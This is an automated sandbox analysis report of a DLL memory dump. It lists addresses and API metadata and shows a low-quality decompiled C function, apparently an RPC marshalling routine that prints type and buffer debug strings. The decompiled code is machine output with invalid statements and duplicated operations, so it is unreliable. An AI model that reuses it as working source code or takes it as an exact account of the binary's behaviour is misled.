                                                                                                0x6eda9159
                                                                                                0x6eda915e
                                                                                                0x6eda9162
                                                                                                0x6eda9166
                                                                                                0x6eda9171
                                                                                                0x6eda9174
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda8feb
                                                                                                0x6eda8feb
                                                                                                0x6eda8ff1
                                                                                                0x6eda8ff5
                                                                                                0x6eda8ff8
                                                                                                0x6eda8ff9
                                                                                                0x6eda8ffc
                                                                                                0x6eda8ffe
                                                                                                0x6eda8fff
                                                                                                0x6eda9004
                                                                                                0x6eda9009
                                                                                                0x6eda900c
                                                                                                0x6eda9015
                                                                                                0x6eda9017
                                                                                                0x6eda901c
                                                                                                0x6eda901c
                                                                                                0x6eda9022
                                                                                                0x6eda9024
                                                                                                0x6eda902c
                                                                                                0x6eda9034
                                                                                                0x6eda9037
                                                                                                0x6eda903a
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda917c
                                                                                                0x6eda917c
                                                                                                0x6eda9183
                                                                                                0x6eda9186
                                                                                                0x6eda9187
                                                                                                0x6eda918a
                                                                                                0x6eda918c
                                                                                                0x6eda918d
                                                                                                0x6eda9192
                                                                                                0x6eda9197
                                                                                                0x6eda919a
                                                                                                0x6eda919d
                                                                                                0x6eda91a0
                                                                                                0x6eda91a1
                                                                                                0x6eda91a6
                                                                                                0x6eda91ab
                                                                                                0x6eda91ae
                                                                                                0x6eda91b1
                                                                                                0x6eda91b7
                                                                                                0x6eda91b9
                                                                                                0x6eda91bc
                                                                                                0x6eda91bc
                                                                                                0x6eda91bf
                                                                                                0x6eda91c2
                                                                                                0x6eda91c8
                                                                                                0x6eda91cc
                                                                                                0x6eda91d3
                                                                                                0x6eda91d8
                                                                                                0x6eda91db
                                                                                                0x6eda91de
                                                                                                0x6eda91e1
                                                                                                0x6eda91e4
                                                                                                0x6eda91eb
                                                                                                0x6eda920c
                                                                                                0x6eda920f
                                                                                                0x6eda9215
                                                                                                0x6eda9219
                                                                                                0x6eda921d
                                                                                                0x6eda9222
                                                                                                0x6eda91ed
                                                                                                0x6eda91ed
                                                                                                0x6eda91f0
                                                                                                0x6eda91f3
                                                                                                0x6eda91f6
                                                                                                0x6eda91f9
                                                                                                0x6eda91fc
                                                                                                0x6eda9203
                                                                                                0x6eda9203
                                                                                                0x6eda9225
                                                                                                0x6eda9229
                                                                                                0x6eda922c
                                                                                                0x6eda922f
                                                                                                0x6eda9233
                                                                                                0x6eda9237
                                                                                                0x6eda9243
                                                                                                0x6eda92d8
                                                                                                0x6eda92d8
                                                                                                0x6eda92db
                                                                                                0x6eda92de
                                                                                                0x6eda92df
                                                                                                0x6eda92e4
                                                                                                0x6eda92e9
                                                                                                0x6eda92ec
                                                                                                0x6eda92ef
                                                                                                0x6eda92f5
                                                                                                0x6eda9302
                                                                                                0x6eda9305
                                                                                                0x6eda9308
                                                                                                0x6eda92f7
                                                                                                0x6eda92fa
                                                                                                0x6eda92fd
                                                                                                0x6eda92fd
                                                                                                0x6eda930e
                                                                                                0x6eda9311
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda924c
                                                                                                0x6eda924f
                                                                                                0x6eda9250
                                                                                                0x6eda9253
                                                                                                0x6eda9255
                                                                                                0x6eda925b
                                                                                                0x6eda925e
                                                                                                0x6eda925f
                                                                                                0x6eda9264
                                                                                                0x6eda9269
                                                                                                0x6eda926c
                                                                                                0x6eda926f
                                                                                                0x6eda9271
                                                                                                0x6eda9274
                                                                                                0x6eda9277
                                                                                                0x6eda927a
                                                                                                0x6eda9280
                                                                                                0x6eda9282
                                                                                                0x6eda9285
                                                                                                0x6eda9287
                                                                                                0x6eda928a
                                                                                                0x6eda928d
                                                                                                0x6eda9290
                                                                                                0x6eda9293
                                                                                                0x6eda9296
                                                                                                0x6eda9298
                                                                                                0x6eda9299
                                                                                                0x6eda929e
                                                                                                0x6eda92a3
                                                                                                0x6eda92a3
                                                                                                0x6eda92a6
                                                                                                0x6eda92a6
                                                                                                0x6eda92aa
                                                                                                0x6eda92ad
                                                                                                0x6eda92b0
                                                                                                0x6eda92b3
                                                                                                0x6eda92b6
                                                                                                0x6eda92b9
                                                                                                0x6eda92bc
                                                                                                0x6eda92bf
                                                                                                0x6eda92c2
                                                                                                0x6eda92c8
                                                                                                0x6eda92cc
                                                                                                0x6eda92d0
                                                                                                0x6eda92d5
                                                                                                0x00000000
                                                                                                0x6eda92c8
                                                                                                0x00000000
                                                                                                0x6eda9319
                                                                                                0x6eda931b
                                                                                                0x6eda931f
                                                                                                0x6eda9323
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9330
                                                                                                0x6eda9332
                                                                                                0x6eda933a
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9347
                                                                                                0x6eda9349
                                                                                                0x6eda934d
                                                                                                0x6eda9351
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda935e
                                                                                                0x6eda935e
                                                                                                0x6eda9361
                                                                                                0x6eda9364
                                                                                                0x6eda9367
                                                                                                0x6eda936b
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9373
                                                                                                0x6eda9378
                                                                                                0x6eda937b
                                                                                                0x6eda9382
                                                                                                0x6eda9385
                                                                                                0x6eda938b
                                                                                                0x6eda938e
                                                                                                0x6eda9391
                                                                                                0x6eda9397
                                                                                                0x6eda939a
                                                                                                0x6eda939d
                                                                                                0x6eda93a1
                                                                                                0x6eda93ad
                                                                                                0x6eda93b0
                                                                                                0x6eda93b3
                                                                                                0x6eda93b4
                                                                                                0x6eda93b7
                                                                                                0x6eda93b8
                                                                                                0x6eda93bd
                                                                                                0x6eda93c2
                                                                                                0x6eda93c5
                                                                                                0x6eda93c8
                                                                                                0x6eda93cb
                                                                                                0x6eda93ce
                                                                                                0x6eda93d5
                                                                                                0x6eda93dc
                                                                                                0x6eda940d
                                                                                                0x6eda9410
                                                                                                0x6eda9413
                                                                                                0x6eda9414
                                                                                                0x6eda9419
                                                                                                0x6eda941e
                                                                                                0x6eda93de
                                                                                                0x6eda93de
                                                                                                0x6eda93e1
                                                                                                0x6eda93e7
                                                                                                0x6eda93fc
                                                                                                0x6eda93ff
                                                                                                0x6eda9400
                                                                                                0x6eda9403
                                                                                                0x6eda9404
                                                                                                0x6eda9407
                                                                                                0x6eda9408
                                                                                                0x6eda93e9
                                                                                                0x6eda93e9
                                                                                                0x6eda93ec
                                                                                                0x6eda93ed
                                                                                                0x6eda93f0
                                                                                                0x6eda93f2
                                                                                                0x6eda93f3
                                                                                                0x6eda93f6
                                                                                                0x6eda93f7
                                                                                                0x6eda93f7
                                                                                                0x6eda940b
                                                                                                0x6eda9421
                                                                                                0x6eda9424
                                                                                                0x6eda9427
                                                                                                0x6eda942d
                                                                                                0x6eda9430
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9438
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda8f74
                                                                                                0x6eda9462
                                                                                                0x6eda9462
                                                                                                0x6eda944e

                                                                                                APIs
                                                                                                  • Part of subcall function 6EDAB030: RpcRaiseException.RPCRT4(000006F7,?,?,?,00000001), ref: 6EDAB08B
                                                                                                  • Part of subcall function 6EDAB030: _memmove.LIBCMT ref: 6EDAB0A0
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA901C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$_memmove
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d <= %p$double=%f <= %p$enum16=%d <= %p$float=%f <= %p$int3264=%ld <= %p$long=%d <= %p$longlong=%s <= %p$pStubMsg->Buffer after %p$pStubMsg->Buffer before %p$pointer=%p <= %p$short=%d <= %p
                                                                                                • API String ID: 2890701851-3536666572
                                                                                                • Opcode ID: 239349f4892442445dfba5ecd6a6906a25b7bd98e53daeeb2bcef6b0e82aefa3
                                                                                                • Instruction ID: b4e3b874f892ed4df266ad89c01bd8a19c0ddd2b94ec122731a9e0f0fa6892af
                                                                                                • Opcode Fuzzy Hash: 239349f4892442445dfba5ecd6a6906a25b7bd98e53daeeb2bcef6b0e82aefa3
                                                                                                • Instruction Fuzzy Hash: 2AD14DB9A00108AFCB04CF98D890EAA7B76EF89354F14C518FA194F345E731EB51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA935E, Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 323COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDA935E() {
				void* _t204;
				void* _t206;

				L0:
				while(1) {
					L0:
					 *(_t204 + 0xc) =  *(_t204 + 0xc) + ( *( *(_t204 + 0x10)) & 0x000000ff) - 0x3c;
					while(1) {
						L44:
						 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
						L1:
						while(( *( *(_t204 + 0x10)) & 0x000000ff) != 0x5b) {
							 *(_t204 - 0xc) =  *( *(_t204 + 0x10)) & 0x000000ff;
							 *(_t204 - 0xc) =  *(_t204 - 0xc) - 1;
							if( *(_t204 - 0xc) > 0xb8) {
								L43:
								0x6eda0000("unhandled format 0x%02x\n",  *( *(_t204 + 0x10)) & 0x000000ff);
								_t206 = _t206 + 8;
								while(1) {
									L44:
									 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
									goto L1;
								}
							}
							L3:
							_t13 =  *(_t204 - 0xc) + 0x6eda94a4; // 0xcccccc0e
							switch( *((intOrPtr*)(( *_t13 & 0x000000ff) * 4 +  &M6EDA9464))) {
								case 0:
									L4:
									_push( *(_t204 + 0xc));
									_push( *( *(_t204 + 0xc)) & 0x0000ffff);
									_push("byte=%d <= %p\n");
									0x6eda0000();
									E6EDAB030( *((intOrPtr*)(_t204 + 8)),  *(_t204 + 0xc), 1);
									_t206 = _t206 + 0x18;
									 *(_t204 + 0xc) =  &(( *(_t204 + 0xc))[0]);
									L44:
									 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
									goto L1;
								case 1:
									L5:
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
									_push("short=%d <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 2);
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 2;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L44:
										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
										goto L1;
									}
								case 2:
									L9:
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("long=%d <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L44:
										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
										goto L1;
									}
								case 3:
									L11:
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									asm("cvtss2sd xmm0, [edx]");
									__esp = __esp - 8;
									asm("movsd [esp], xmm0");
									_push("float=%f <= %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L44:
										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
										goto L1;
									}
								case 4:
									L12:
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ecx + 4);
									_push( *(__ecx + 4));
									__eax =  *__ecx;
									_push(__eax);
									0x6eda0000();
									__esp = __esp + 8;
									_push(__eax);
									_push("longlong=%s <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ebp + 8);
									E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8) =  *(__ebp + 0xc);
									__eax =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L44:
										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
										goto L1;
									}
								case 5:
									L13:
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__esp = __esp - 8;
									asm("movsd xmm0, [edx]");
									asm("movsd [esp], xmm0");
									_push("double=%f <= %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8);
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L44:
										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
										goto L1;
									}
								case 6:
									L6:
									__edx =  *(__ebp + 0xc);
									 *(__ebp - 4) =  *( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("enum16=%d <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									if( *( *(__ebp + 0xc)) > 0x7fff) {
										_push(0x6f5);
										__imp__RpcRaiseException();
									}
									L8:
									__edx = __ebp - 4;
									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8), __ebp - 4, 2);
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L44:
										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
										goto L1;
									}
								case 7:
									L14:
									 *(__ebp - 0x18) = 0;
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("pointer=%p <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									_push( *(__eax + 4));
									_push("pStubMsg->Buffer before %p\n");
									0x6eda0000();
									__esp = __esp + 8;
									__edx =  *(__ebp + 0x10);
									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										__ecx =  *(__ebp + 0x10);
										 *(__ebp + 0x14) =  *(__ebp + 0x10);
									}
									__edx =  *(__ebp + 0x14);
									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
										__ecx =  *(__ebp + 8);
										__ecx =  *(__ebp + 8) + 4;
										__eax = E6EDA7400( *(__ebp + 8) + 4,  *(__ebp + 8) + 4, 4);
									}
									__edx =  *(__ebp + 8);
									__eax =  *(__edx + 4);
									 *(__ebp - 0x1c) =  *(__edx + 4);
									__ecx =  *(__ebp + 8);
									if( *( *(__ebp + 8) + 0x34) == 0) {
										__eax =  *(__ebp + 0x14);
										__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__edx =  *(__ebp + 8);
											__eax = E6EDAAF00( *(__ebp + 8), 4);
										}
									} else {
										__edx =  *(__ebp + 8);
										__eax =  *(__ebp + 8);
										__ecx =  *(__eax + 0x34);
										 *( *(__ebp + 8) + 4) =  *(__eax + 0x34);
										__edx =  *(__ebp + 8);
										 *( *(__ebp + 8) + 0x34) = 0;
										 *(__ebp - 0x18) = 1;
									}
									__eax =  *(__ebp + 0x14);
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									__eax =  *(__ebp - 0x1c);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB220( *(__ebp + 8),  *(__ebp - 0x1c),  *( *(__ebp + 0xc)),  *(__ebp + 0x14));
									if( *(__ebp - 0x18) == 0) {
										L28:
										__edx =  *(__ebp + 8);
										__eax =  *(__edx + 4);
										_push( *(__edx + 4));
										_push("pStubMsg->Buffer after %p\n");
										0x6eda0000();
										__esp = __esp + 8;
										__ecx =  *(__ebp + 0x10);
										__edx =  *__ecx & 0x000000ff;
										if(( *__ecx & 0x000000ff) != 0x36) {
											__ecx =  *(__ebp + 0x10);
											__ecx =  *(__ebp + 0x10) + 4;
											 *(__ebp + 0x10) = __ecx;
										} else {
											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
										}
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										while(1) {
											L44:
											 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
											goto L1;
										}
									} else {
										do {
											L23:
											__edx =  *(__ebp + 8);
											__eax =  *(__edx + 0x14);
											_push( *(__edx + 0x14));
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__ebp + 8);
											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
											_push( *(__eax + 4) -  *(__edx + 8));
											_push("buffer=%d/%d\n");
											0x6eda0000();
											__esp = __esp + 0xc;
											__edx =  *(__ebp + 8);
											__eax =  *( *(__ebp + 8));
											__ecx =  *(__eax + 8);
											__edx =  *(__ebp + 8);
											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__eax =  *(__ebp + 8);
											if( *( *(__ebp + 8) + 4) > __ecx) {
												__ecx =  *(__ebp + 8);
												__edx =  *( *(__ebp + 8));
												__eax =  *(__edx + 8);
												__ecx =  *(__ebp + 8);
												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
												__edx =  *(__ebp + 8);
												 *(__edx + 4) =  *(__edx + 4) - __eax;
												_push( *(__edx + 4) - __eax);
												_push("buffer overflow %d bytes\n");
												0x6eda0000();
												__esp = __esp + 8;
											}
											__edx = 0;
										} while (0 != 0);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 4);
										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp - 0x1c);
										 *( *(__ebp + 8) + 4) =  *(__ebp - 0x1c);
										__edx =  *(__ebp + 0x14);
										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__ecx =  *(__ebp + 8);
											__eax = E6EDAAF00( *(__ebp + 8), 4);
										}
										goto L28;
									}
								case 8:
									L32:
									__eax =  *(__ebp - 0x10);
									__ecx = __ebp + 0xc;
									__eax = E6EDA7450(__ecx, __ecx,  *(__ebp - 0x10), 2);
									while(1) {
										L44:
										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
										goto L1;
									}
								case 9:
									L33:
									__edx =  *(__ebp - 0x10);
									__ebp + 0xc = E6EDA7450(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 4);
									while(1) {
										L44:
										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
										goto L1;
									}
								case 0xa:
									L34:
									__ecx =  *(__ebp - 0x10);
									__edx = __ebp + 0xc;
									__eax = E6EDA7450(__ecx, __ebp + 0xc, __ecx, 8);
									while(1) {
										L44:
										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
										goto L1;
									}
								case 0xb:
									goto L0;
								case 0xc:
									L35:
									1 = 1 << 0;
									__edx =  *(__ebp + 0x10);
									 *(__edx + (1 << 0)) & 0x000000ff = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0xc) = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									__edx =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp + 8);
									 *(__ebp - 0x20) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp - 0x20);
									_push( *(__ebp - 0x20));
									_push("embedded complex (size=%d) <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__edx =  *(__ebp - 8);
									__eax =  *( *(__ebp - 8)) & 0x000000ff;
									__eax =  *( *(__ebp - 8)) & 0x7f;
									__ecx =  *(0x6edbb218 + __eax * 4);
									 *(__ebp - 0x14) =  *(0x6edbb218 + __eax * 4);
									if( *(__ebp - 0x14) == 0) {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										_push( *( *(__ebp - 8)) & 0x000000ff);
										_push("no marshaller for embedded type %02x\n");
										0x6eda0000();
										__esp = __esp + 8;
									} else {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax =  *(__ebp + 0xc);
											_push( *(__ebp + 0xc));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										} else {
											__ecx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__edx =  *(__ebp + 0xc);
											__eax =  *( *(__ebp + 0xc));
											_push( *( *(__ebp + 0xc)));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										}
									}
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x20);
									 *(__ebp + 0xc) = __ecx;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									goto L1;
								case 0xd:
									L42:
									while(1) {
										L44:
										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
										goto L1;
									}
								case 0xe:
									L10:
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									 *(__ebp - 0x24) =  *( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("int3264=%ld <= %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx = __ebp - 0x24;
									__edx =  *(__ebp + 8);
									E6EDAB030( *(__ebp + 8), __ebp - 0x24, 4) =  *(__ebp + 0xc);
									__eax =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L44:
										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
										goto L1;
									}
								case 0xf:
									goto L43;
							}
						}
						return  *(_t204 + 0xc);
					}
				}
			}





                                                                                                0x6eda935e
                                                                                                0x6eda935e
                                                                                                0x6eda935e
                                                                                                0x6eda936b
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda8f3c
                                                                                                0x6eda8f51
                                                                                                0x6eda8f5a
                                                                                                0x6eda8f64
                                                                                                0x6eda943a
                                                                                                0x6eda9446
                                                                                                0x6eda944b
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x6eda944e
                                                                                                0x6eda8f6a
                                                                                                0x6eda8f6d
                                                                                                0x6eda8f74
                                                                                                0x00000000
                                                                                                0x6eda8f7b
                                                                                                0x6eda8f7e
                                                                                                0x6eda8f85
                                                                                                0x6eda8f86
                                                                                                0x6eda8f8b
                                                                                                0x6eda8f9d
                                                                                                0x6eda8fa2
                                                                                                0x6eda8fab
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda8fb3
                                                                                                0x6eda8fb3
                                                                                                0x6eda8fb6
                                                                                                0x6eda8fb7
                                                                                                0x6eda8fba
                                                                                                0x6eda8fbd
                                                                                                0x6eda8fbe
                                                                                                0x6eda8fc3
                                                                                                0x6eda8fc8
                                                                                                0x6eda8fcd
                                                                                                0x6eda8fd5
                                                                                                0x6eda8fdd
                                                                                                0x6eda8fe0
                                                                                                0x6eda8fe3
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9042
                                                                                                0x6eda9042
                                                                                                0x6eda9045
                                                                                                0x6eda9046
                                                                                                0x6eda9049
                                                                                                0x6eda904b
                                                                                                0x6eda904c
                                                                                                0x6eda9051
                                                                                                0x6eda9056
                                                                                                0x6eda905b
                                                                                                0x6eda9063
                                                                                                0x6eda906b
                                                                                                0x6eda906e
                                                                                                0x6eda9071
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda90b8
                                                                                                0x6eda90b8
                                                                                                0x6eda90bb
                                                                                                0x6eda90bc
                                                                                                0x6eda90bf
                                                                                                0x6eda90c3
                                                                                                0x6eda90c6
                                                                                                0x6eda90cb
                                                                                                0x6eda90d0
                                                                                                0x6eda90d5
                                                                                                0x6eda90da
                                                                                                0x6eda90de
                                                                                                0x6eda90e2
                                                                                                0x6eda90ed
                                                                                                0x6eda90f0
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda90f8
                                                                                                0x6eda90f8
                                                                                                0x6eda90fb
                                                                                                0x6eda90fc
                                                                                                0x6eda90ff
                                                                                                0x6eda9102
                                                                                                0x6eda9103
                                                                                                0x6eda9105
                                                                                                0x6eda9106
                                                                                                0x6eda910b
                                                                                                0x6eda910e
                                                                                                0x6eda910f
                                                                                                0x6eda9114
                                                                                                0x6eda9119
                                                                                                0x6eda911e
                                                                                                0x6eda9122
                                                                                                0x6eda912e
                                                                                                0x6eda9131
                                                                                                0x6eda9134
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda913c
                                                                                                0x6eda913c
                                                                                                0x6eda913f
                                                                                                0x6eda9140
                                                                                                0x6eda9143
                                                                                                0x6eda9146
                                                                                                0x6eda914a
                                                                                                0x6eda914f
                                                                                                0x6eda9154
                                                                                                0x6eda9159
                                                                                                0x6eda915e
